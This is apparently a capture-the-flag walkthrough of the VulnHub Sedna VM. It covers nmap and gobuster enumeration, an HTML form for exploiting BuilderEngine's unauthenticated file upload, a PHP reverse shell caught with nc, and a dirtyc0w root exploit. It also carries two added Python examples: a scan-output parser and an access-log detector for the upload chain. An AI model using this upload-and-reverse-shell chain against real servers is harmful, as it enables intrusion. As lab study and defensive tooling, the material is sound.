Hi there,
In this post I will walk through the hackfest2016: Sedna VM. So let's start!
Enumeration:
We will scan all TCP ports along with the top UDP ports.
root@kali:~/vulnhub/sedna# nmap -sS -p- -A --reason 192.168.17.156 \
> && nmap -sU -sV -A --top-ports 100 192.168.17.156 \
> && nmap -sU -p 161 192.168.17.156 \
> && nmap -sU -p 69 192.168.17.156

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:35 +03
Nmap scan report for 192.168.17.156
Host is up, received arp-response (0.0011s latency).
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp    open  domain      syn-ack ttl 64 ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL STLS TOP CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4       111/tcp  rpcbind
|   100000  2,3,4       111/udp  rpcbind
|   100024  1         32833/tcp  status
|_  100024  1         55738/udp  status
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        syn-ack ttl 64 Dovecot imapd (Ubuntu)
|_imap-capabilities: more IDLE LOGIN-REFERRALS post-login STARTTLS Pre-login LITERAL+ IMAP4rev1 LOGINDISABLEDA0001 capabilities listed have OK ID SASL-IR ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    syn-ack ttl 64 Dovecot imapd (Ubuntu)
|_imap-capabilities: IDLE LOGIN-REFERRALS post-login more AUTH=PLAINA0001 LITERAL+ IMAP4rev1 capabilities Pre-login listed have OK ID SASL-IR ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
995/tcp   open  ssl/pop3    syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE USER SASL(PLAIN) TOP CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
8080/tcp  open  http        syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
32833/tcp open  status      syn-ack ttl 64 1 (RPC #100024)
MAC Address: 00:0C:29:E7:55:B6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -32s, deviation: 0s, median: -32s
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-04-27T10:35:56-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   1.08 ms 192.168.17.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.96 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:38 +03
Nmap scan report for 192.168.17.156
Host is up (0.00091s latency).
Not shown: 49 closed ports, 47 open|filtered ports
PORT     STATE SERVICE    VERSION
53/udp   open  domain     ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_  bind.version: 9.9.5-3-Ubuntu
|_dns-recursion: Recursion appears to be enabled
111/udp  open  rpcbind    2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4       111/tcp  rpcbind
|   100000  2,3,4       111/udp  rpcbind
|   100024  1         32833/tcp  status
|_  100024  1         55738/udp  status
137/udp  open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
5353/udp open  mdns       DNS-based service discovery
| dns-service-discovery:
|   9/tcp workstation
|_    Address=192.168.17.156 fe80:0:0:0:20c:29ff:fee7:55b6
MAC Address: 00:0C:29:E7:55:B6 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: SEDNA

Host script results:
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.91 ms 192.168.17.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 268.13 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:42 +03
Nmap scan report for 192.168.17.156
Host is up (0.00092s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:E7:55:B6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.09 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:42 +03
Nmap scan report for 192.168.17.156
Host is up (0.0012s latency).
PORT   STATE  SERVICE
69/udp closed tftp
MAC Address: 00:0C:29:E7:55:B6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
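A scan like the one above yields a lot of text, and the findings that matter for an attack-surface review (risky HTTP methods, SMB signing off, open DNS recursion, a robots.txt that hides paths) are buried in the script output. The following is an added example, not part of the original walkthrough: a small Python parser for nmap's normal output that lists the open ports with their version strings and flags those findings. It runs on a constructed excerpt of the scan output shown above; the rule set and wording are my own, and the "verify" caveat on the HTTP-methods rule reflects that nmap's http-methods result can be a false positive, as it turned out to be here.

```python
import re

# Constructed excerpt of the nmap normal-format output from the scan above,
# trimmed to the lines the parser needs (TCP table with --reason, host scripts,
# then the UDP table without --reason).
SAMPLE_SCAN = """\
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp    open  domain      syn-ack ttl 64 ISC BIND 9.9.5-3-Ubuntu
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
8080/tcp  open  http        syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
PORT     STATE  SERVICE    VERSION
53/udp   open   domain     ISC BIND 9.9.5-3-Ubuntu
|_dns-recursion: Recursion appears to be enabled
161/udp  closed snmp
"""

# One row of the port table: "22/tcp open ssh <reason...> <version>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# The extra column that --reason inserts in front of the version string
REASON = re.compile(r"^(?:syn-ack|udp-response|reset|no-response|port-unreach)(?:\s+ttl\s+\d+)?\s*")

# Script-output fragments worth a second look during an attack-surface review
# (rule set chosen for this example; extend as needed).
FINDINGS = [
    (re.compile(r"Potentially risky methods:\s*(.+)"),
     "HTTP methods that modify content are advertised: {0} (verify, can be a false positive)"),
    (re.compile(r"message_signing:\s*disabled"), "SMB message signing disabled"),
    (re.compile(r"account_used:\s*guest"), "SMB guest session accepted"),
    (re.compile(r"dns-recursion:\s*Recursion appears to be enabled"), "DNS recursion open to this client"),
    (re.compile(r"http-robots\.txt:\s*(\d+) disallowed entr"), "robots.txt lists {0} disallowed path(s)"),
]


def parse_scan(text):
    """Return (open_ports, findings) from nmap normal-format output.

    open_ports: dicts with port, proto, service and version for each open port.
    findings:   (context, description) pairs; context is "port/proto" for port
                scripts or "host" for lines under "Host script results".
    """
    open_ports, findings, context = [], [], None
    for line in text.splitlines():
        line = line.rstrip()
        if line.startswith("Host script results"):
            context = "host"
            continue
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, rest = m.groups()
            context = f"{port}/{proto}"  # following "|" lines belong to this port
            if state == "open":
                open_ports.append({
                    "port": int(port), "proto": proto, "service": service,
                    "version": REASON.sub("", rest, count=1).strip(),
                })
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ")  # drop nmap's tree-drawing prefix
            for pattern, template in FINDINGS:
                fm = pattern.search(body)
                if fm:
                    findings.append((context, template.format(*fm.groups())))
    return open_ports, findings


def report(text):
    """Human-readable summary lines: open ports first, then flagged findings."""
    open_ports, findings = parse_scan(text)
    lines = [f"{p['port']}/{p['proto']:<3} {p['service']:<12} {p['version']}" for p in open_ports]
    lines += [f"[!] {ctx}: {desc}" for ctx, desc in findings]
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_SCAN)))
```

Feed it the saved `-oN` file of a real scan instead of the embedded sample; the same parser handles both the `--reason` and plain table layouts because the reason column is stripped only when present.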
There are two web applications, on ports 80 and 8080. I tried to attack the Tomcat server on port 8080 by abusing the PUT HTTP method, but it turned out that the Nmap result was a false positive. I also could not log in to the Tomcat manager panel with default credentials or common passwords.
Now let's try the web application on port 80. There is nothing interesting, just an HTML page with a planet photo, so in this case I will brute force directories.
gobuster -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e -u http://192.168.17.156
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.17.156/
[+] Threads : 10
[+] Wordlist : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 302,307,403,500,200,204,301
[+] Expanded : true
=====================================================
http://192.168.17.156/.htaccess (Status: 403)
http://192.168.17.156/.hta (Status: 403)
http://192.168.17.156/.htpasswd (Status: 403)
http://192.168.17.156/blocks (Status: 301)
http://192.168.17.156/files (Status: 301)
http://192.168.17.156/index.html (Status: 200)
http://192.168.17.156/modules (Status: 301)
http://192.168.17.156/robots.txt (Status: 200)
http://192.168.17.156/server-status (Status: 403)
http://192.168.17.156/system (Status: 301)
http://192.168.17.156/themes (Status: 301)
=====================================================
The themes directory seems interesting.
After browsing the directories, we can tell that the application in use is BuilderEngine.
So I searched exploit-db.com for a submitted exploit and found this one:
Exploitation:
Basically this exploit makes a POST request to the web application and uploads an arbitrary file. I edited the exploit to point to the VM's IP address, then tried to upload the well-known php-reverse-shell after editing my listening IP and port.
root@kali:~/vulnhub/sedna# cat > upload.html
<html>
<body>
<form method="post" action="http://192.168.17.156/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
^C
Then we get the following response from the application.
Now all we have to do is reach the file in the files directory, as mentioned in the exploit, with an nc listener set up to catch the reverse shell.
http://192.168.17.156/files/php-reverse-shell.php
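From the defender's side, the whole chain above is visible in the web server's access log as two requests: a POST to the unauthenticated jquery-file-upload handler, then a GET for a PHP file under /files/ from the same client shortly afterwards. The following is an added example, not from the original post: a Python detector that runs over constructed Apache combined-log lines modelling that sequence and raises a high-severity alert when the upload and the script request correlate. The handler path and the /files/ directory are taken from the walkthrough; the 10-minute correlation window, the extension list and the severity labels are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-log lines modelling the sequence in the walkthrough:
# a POST to the jquery-file-upload handler, then a GET for the uploaded PHP file
# under /files/ from the same client. The PDF request is benign noise.
SAMPLE_LOG = """\
192.168.17.1 - - [27/Apr/2017:17:55:01 -0400] "GET /themes/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.17.1 - - [27/Apr/2017:17:56:10 -0400] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.17.1 - - [27/Apr/2017:17:56:40 -0400] "GET /files/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.17.23 - - [27/Apr/2017:18:02:05 -0400] "GET /files/brochure.pdf HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
192.168.17.1 - - [27/Apr/2017:18:10:00 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumptions for this example: the BuilderEngine upload handler path from the
# walkthrough, the /files/ directory it writes into, and a 10-minute window in
# which an upload followed by a script request counts as one incident.
UPLOAD_HANDLER = "/jquery-file-upload/server/php/"
UPLOAD_DIR = "/files/"
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")
WINDOW = timedelta(minutes=10)


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # ignore the query string
        "status": int(m["status"]),
    }


def detect(log_text):
    """Return alerts as (severity, client_ip, timestamp, message) tuples."""
    alerts = []
    uploads = {}  # client ip -> timestamps of POSTs to the upload handler
    for rec in map(parse_line, log_text.splitlines()):
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].endswith(UPLOAD_HANDLER):
            uploads.setdefault(rec["ip"], []).append(rec["ts"])
            alerts.append(("medium", rec["ip"], rec["ts"],
                           "POST to unauthenticated file-upload handler"))
        elif (rec["method"] == "GET" and rec["path"].startswith(UPLOAD_DIR)
              and rec["path"].lower().endswith(SCRIPT_EXT)):
            # Correlate with an earlier upload from the same client inside the window.
            recent = [t for t in uploads.get(rec["ip"], [])
                      if timedelta(0) <= rec["ts"] - t <= WINDOW]
            if recent:
                gap = int((rec["ts"] - recent[-1]).total_seconds())
                alerts.append(("high", rec["ip"], rec["ts"],
                               f"script {rec['path']} requested {gap}s after an upload from the same client"))
            else:
                alerts.append(("medium", rec["ip"], rec["ts"],
                               f"script {rec['path']} requested from upload directory"))
    return alerts


if __name__ == "__main__":
    for severity, ip, ts, message in detect(SAMPLE_LOG):
        print(f"[{severity}] {ts.isoformat()} {ip}: {message}")
```

Detection is the fallback; the fix is to remove or authenticate the bundled upload handler and to configure the web server so that nothing written under the upload directory is ever handed to the PHP engine, which turns an uploaded shell into an inert file.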
After looking around a bit we got the first flag:
Privilege Escalation:
I always try kernel exploits first, but this time I could not get a root shell after trying many of them. I then tried the dirtyc0w kernel exploit, since the victim system fit, and luckily it worked.